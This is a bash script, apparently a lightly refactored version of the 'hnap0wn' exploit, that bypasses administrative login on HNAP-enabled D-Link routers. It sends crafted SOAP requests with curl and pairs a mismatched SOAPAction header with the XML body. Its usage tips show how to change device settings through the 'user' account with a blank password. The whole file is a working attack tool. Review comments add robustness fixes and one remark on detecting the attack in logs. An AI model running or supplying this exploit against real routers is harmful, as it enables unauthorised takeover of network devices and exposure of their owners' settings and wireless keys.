#!/bin/bash
###############################################################################################
# Description:
#
#	Administrative login bypass exploit for HNAP enabled D-Link routers.
#
# Usage:
#
#	./hnap0wn <user:password@ip:port> <xml file> [SOAPAction]
#
# Tips: 
#
#	1) Try logging in with user name of 'user' and a blank password:
#
#		./hnap0wn user:@192.168.0.1 xml/SetDeviceSettings.xml
#
#	2) Try specifying the 'GetDeviceSettings' SOAPAction for all actions:
#
#		./hnap0wn 192.168.0.1:8099 xml/SetDeviceSettings.xml GetDeviceSettings
#
###############################################################################################

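# Sends the contents of an XML file as an HNAP SOAP request to
# http://<target>/HNAP1/ and prints the device's response.
#
# Arguments: $1 - target as [user:password@]ip[:port]
#            $2 - path to the XML request body
#            $3 - optional SOAPAction name; defaults to the XML file's base
#                 name up to its first '.'
# Exit code: 2 on missing arguments, 1 if the XML file is missing or
#            unreadable, otherwise curl's own exit status.

# Warn, but keep going as the script always has, when curl is not on PATH.
# `command -v` replaces `which`, which is not guaranteed to be installed.
if ! command -v curl >/dev/null 2>&1; then
	printf '\nWARNING: curl not found! Make sure it is installed and in your PATH.\n\n' >&2
fi

# Both the target and the XML file are mandatory.
if [[ -z "${2:-}" ]]; then
	printf '\nUsage:    %s <user:password@ip:port> <xml file> [SOAPAction]\n\n' "$0" >&2
	printf '\nExamples: %s 192.168.0.1:8099 xml/GetWLanSecurity.xml GetDeviceSettings\n' "$0" >&2
	printf '          %s user:@192.168.0.1 xml/GetWLanSecurity.xml\n\n' "$0" >&2
	# A usage error is a failure; a bare `exit` here reported success.
	exit 2
fi

TARGET=$1
FILE=$2
ACTION=${3:-}

# If no action name was explicitly set, use the default (file name minus
# extension). Parameter expansion avoids the unquoted `echo $FILE | sed | cut`
# pipeline, which mangled paths containing spaces or glob characters.
if [[ -z "$ACTION" ]]; then
	ACTION=${FILE##*/}
	ACTION=${ACTION%%.*}
fi

# Make sure the specified file exists
if [[ ! -e "$FILE" ]]; then
	printf "\nERROR: '%s' not found!\n\n" "$FILE" >&2
	exit 1
fi

# Read the body up front so an unreadable file (or a directory) stops the
# run instead of sending an empty request.
BODY=$(cat -- "$FILE") || exit 1

printf '\n'
# NOTE(review): the SOAPAction header is chosen independently of the XML body
# (see tip 2 in the header comment), so the two can name different actions.
# On the defending side, that header/body mismatch in requests to /HNAP1/ is
# presumably the signal to look for in HTTP logs.
# --insecure is kept from the original but has no effect here: the URL scheme
# is hard-coded to http://, so no TLS verification takes place at all.
STATUS=0
curl --insecure \
	--header "SOAPAction: \"http://purenetworks.com/HNAP1/$ACTION\"" \
	-d "$BODY" \
	"http://${TARGET}/HNAP1/" || STATUS=$?
printf '\n\n'
# Propagate curl's result; previously the trailing echo forced exit code 0.
exit "$STATUS"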
